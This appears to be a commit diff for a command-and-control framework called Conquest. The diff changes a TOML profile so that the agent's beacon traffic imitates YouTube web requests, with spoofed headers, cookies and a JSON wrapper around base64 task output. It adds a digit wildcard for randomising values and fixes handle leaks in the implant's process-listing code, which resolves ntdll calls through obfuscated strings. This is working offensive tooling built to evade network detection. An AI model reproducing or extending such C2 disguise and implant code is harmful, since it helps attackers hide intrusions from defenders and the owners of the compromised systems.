Updated youtube video profile.

data/profile.toml

@@ -113,6 +113,7 @@ lang = [
     "en-US",
     "de-AT"
 ]
+page = "1$"
 
 # Defines how the POST requests made by the agents look like
 # For modules that involve large file transfers, it is not recommended to place the task output in a header or query parameter, as this will exceed the header size

data/youtube.toml

@@ -46,7 +46,6 @@ Sec-Ch-Ua-Model = "''"
 Sec-Ch-Ua-Bitness = "''"
 Sec-Ch-Ua-Wow64 = "?0"
 Accept-Language = [
-    "en-GB,en;q=0.9",
     "en-US,en;q=0.9",
     "de-AT,de;q=0.9,en;q=0.8"
 ]
@@ -57,7 +56,6 @@ Sec-Fetch-Site = "none"
 Sec-Fetch-Mode = "navigate"
 Sec-Fetch-User = "?1"
 Sec-Fetch-Dest = "document"
-# Accept-Encoding = "gzip, deflate, br"     # While this is in the normal request, it breaks the C2 communication, so its commented out
 Priority = "u=0, i"
 
 # Defines arbitrary headers that are added to the server's response
@@ -102,9 +100,18 @@ request-methods = "POST"
 [http-post.agent.headers]
 Host = "www.youtube.com"
 Referer = "https://www.youtube.com/watch?v=###########"
-Content-Type = "application/octet-stream" 
+Content-Type = "application/json" 
 Connection = "Keep-Alive"
 Cache-Control = "no-cache"
+Sec-Ch-Ua = "'Not.A/Brand';v='99', 'Chromium';v='136'"
+Sec-Ch-Ua-Mobile = "?0"
+Sec-Ch-Ua-Full-Version = "''"
+Sec-Ch-Ua-Arch = "''"
+Sec-Ch-Ua-Platform = "'Windows'"
+Sec-Ch-Ua-Platform-Version = "''"
+Sec-Ch-Ua-Model = "''"
+Sec-Ch-Ua-Bitness = "''"
+Sec-Ch-Ua-Wow64 = "?0"
 Cookie = "YSC=###########; SOCS=##############################################; VISITOR_PRIVACY_METADATA=##################################################################; __Secure-1PSIDTS=sidts-#######_##########################################_#########################; __Secure-3PSIDTS=sidts-#######_##########################################_#########################; HSID=####################;"               
 
 [http-post.agent.parameters]
@@ -115,6 +122,9 @@ pretty-print = [
 
 [http-post.agent.output]
 placement = { type = "body" }
+encoding = { type = "base64", url-safe = true }
+prefix = "{'context':{'client':{'hl':'de','gl':'AT','remoteHost':'$$.1$$.$$.1$$','deviceMake':'','deviceModel':'','visitorData':'Cgt1M016MzRrZmhTUSj12MbIBjInCgJBVBIhEh0SGwsMDg8QERITFBUWFxgZGhscHR4fICEiIyQlJiBe','userAgent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36,gzip(gfe)','clientName':'WEB','clientVersion':'2.20251107.01.00','osName':'Windows','osVersion':'10.0','originalUrl':'https://www.youtube.com/','screenPixelDensity':2,'platform':'DESKTOP','clientFormFactor':'UNKNOWN_FORM_FACTOR','configInfo':{'appInstallData':'"
+suffix = "'},'screenDensityFloat':1.5,'userInterfaceTheme':'USER_INTERFACE_THEME_DARK','timeZone':'Europe/Vienna','browserName':'Chrome','browserVersion':'142.0.0.0','acceptHeader':'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7','deviceExperimentId':'ChxOelUzTVRBeU1qQTJPVEV4TkRFNU5qUXhOQT09EPXYxsgGGPXYxsgG','rolloutToken':'CJu4u9qz64jjcxCr8dad-t-QAxjzyIbunueQAw%3D%3D','screenWidthPoints':1920,'screenHeightPoints':1065,'utcOffsetMinutes':60,'connectionType':'CONN_CELLULAR_3G','memoryTotalKbytes':'8000000','mainAppWebInfo':{'graftUrl':'https://www.youtube.com/watch?v=###########&list=RD4WIMyqBG9gs&start_radio=1','pwaInstallabilityStatus':'PWA_INSTALLABILITY_STATUS_UNKNOWN','webDisplayMode':'WEB_DISPLAY_MODE_BROWSER','isWebNativeShareAvailable':true}},'user':{'lockedSafetyMode':false},'request':{'useSsl':true,'internalExperimentFlags':[],'consistencyTokenJars':[]},'clickTracking':{'clickTrackingParams':'CJgFEKVBIhMIucGi957nkAMVneRJBx3cFhscygEErMFOaw=='},'adSignalsInfo':{'params':[{'key':'dt','value':'1762765953510'},{'key':'flash','value':'0'},{'key':'frm','value':'0'},{'key':'u_tz','value':'60'},{'key':'u_his','value':'4'},{'key':'u_h','value':'1200'},{'key':'u_w','value':'1920'},{'key':'u_ah','value':'1152'},{'key':'u_aw','value':'1920'},{'key':'u_cd','value':'24'},{'key':'bc','value':'31'},{'key':'bih','value':'1065'},{'key':'biw','value':'1905'},{'key':'brdim','value':'0,0,0,0,1920,0,1920,1152,1920,1065'},{'key':'vis','value':'1'},{'key':'wgl','value':'true'},{'key':'ca_type','value':'image'}],'bid':'ANyPxKqp2RGW0TLEXMjNbBRm6ZPDYteE8iHnYK0DaJMOiTEHrbqefZtn6qfK_MhA2-ZgnoosEwKaN8pi77jJRptRzz5Rsm-P_w'}},'target':{'videoId':'###########'},'params':'Cg0KCzRXSU15cUJHOWdzIAAyDAiJ2cbIBhCm6ueLAQ%3D%3D'}"
 
 [http-post.server.headers]
 Content-Type = "application/json; charset=utf-8"
@@ -128,4 +138,4 @@ Strict-Transport-Security = "max-age=31536000"
 Alt-Svc = "h3=':443'; ma=2592000,h3-29=':443'; ma=2592000"
 
 [http-post.server.output]
-body = ""
+body = "{'responseContext': {}}"

docs/3-PROFILE.md

@@ -12,7 +12,7 @@
 
 ## General
 
-Conquest supports malleable C2 profiles written using the TOML configuration language. This allows the complete customization of network traffic using data transformation, encoding and randomization. Wildcard characters `#` are replaced by a random alphanumerical character, making it possible to add even more variation to requests via randomized parameters or cookies.  
+Conquest supports malleable C2 profiles written using the TOML configuration language. This allows the complete customization of network traffic using data transformation, encoding and randomization. Wildcard characters `#` are replaced by a random alphanumerical character, making it possible to add even more variation to requests via randomized parameters or cookies. There is also the `$` wildcard, which is replaced by a single digit, for randomizing numeric values.  
 
 General settings that are defined at the beginning of the profile are the profile name and the relative location of important files, such as the team server's private key or the Conquest database.
 

src/agent/core/process.nim

@@ -54,7 +54,7 @@ proc processList*(): Table[DWORD, ProcessInfo] =
     # Take a snapshot of running processes
     var sysProcessInfo = processSnapshot() 
     defer: LocalFree(cast[HLOCAL](sysProcessInfo))
-    
+
     let pNtOpenProcess = cast[NtOpenProcess](GetProcAddress(GetModuleHandleA(protect("ntdll")), protect("NtOpenProcess")))
     let pNtOpenProcessToken = cast[NtOpenProcessToken](GetProcAddress(GetModuleHandleA(protect("ntdll")), protect("NtOpenProcessToken")))
     let pNtClose = cast[NtClose](GetProcAddress(GetModuleHandleA(protect("ntdll")), protect("NtClose")))
@@ -62,8 +62,8 @@ proc processList*(): Table[DWORD, ProcessInfo] =
     while true: 
         var 
             status: NTSTATUS
-            hToken: HANDLE 
-            hProcess: HANDLE
+            hToken: HANDLE = 0
+            hProcess: HANDLE = 0
             oa: OBJECT_ATTRIBUTES
             clientId: CLIENT_ID
         
@@ -90,9 +90,10 @@ proc processList*(): Table[DWORD, ProcessInfo] =
             status = pNtOpenProcessToken(hProcess, TOKEN_QUERY, addr hToken)
             if status == STATUS_SUCCESS and hToken != 0: 
                 result[pid].user = hToken.getTokenUser().username
-        defer:
+                discard pNtClose(hToken)
+            else: 
+                result[pid].user = ""
             discard pNtClose(hProcess)
-            discard pNtClose(hToken)
 
         # Move to next process
         if sysProcessInfo.NextEntryOffset == 0: 

src/common/profile.nim

@@ -24,6 +24,10 @@ proc randomChar(): char =
     let alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
     return alphabet[rand(alphabet.len - 1)]
 
+proc randomNumber(): char = 
+    let numbers = "0123456789"
+    return numbers[rand(numbers.len - 1)]
+
 proc getRandom*(values: seq[TomlValueRef]): TomlValueRef = 
     if values.len == 0: 
         return nil
@@ -39,7 +43,7 @@ proc getStringValue*(key: TomlValueRef, default: string = ""): string =
         value = key.getElems().getRandom().getStr(default)
     
     # Replace '#' with a random alphanumerical character and return the resulting string
-    return value.mapIt(if it == '#': randomChar() else: it).join("")
+    return value.mapIt(if it == '#': randomChar() elif it == '$': randomNumber() else: it).join("")
 
 proc getString*(profile: Profile, path: string, default: string = ""): string =  
     let key = profile.findKey(path)

src/modules/systeminfo.nim

@@ -49,7 +49,7 @@ when defined(agent):
         try: 
             var processes: seq[DWORD] = @[]
             var output: string = ""
-            
+
             var procMap = processList() 
 
             # Create child-parent process relationships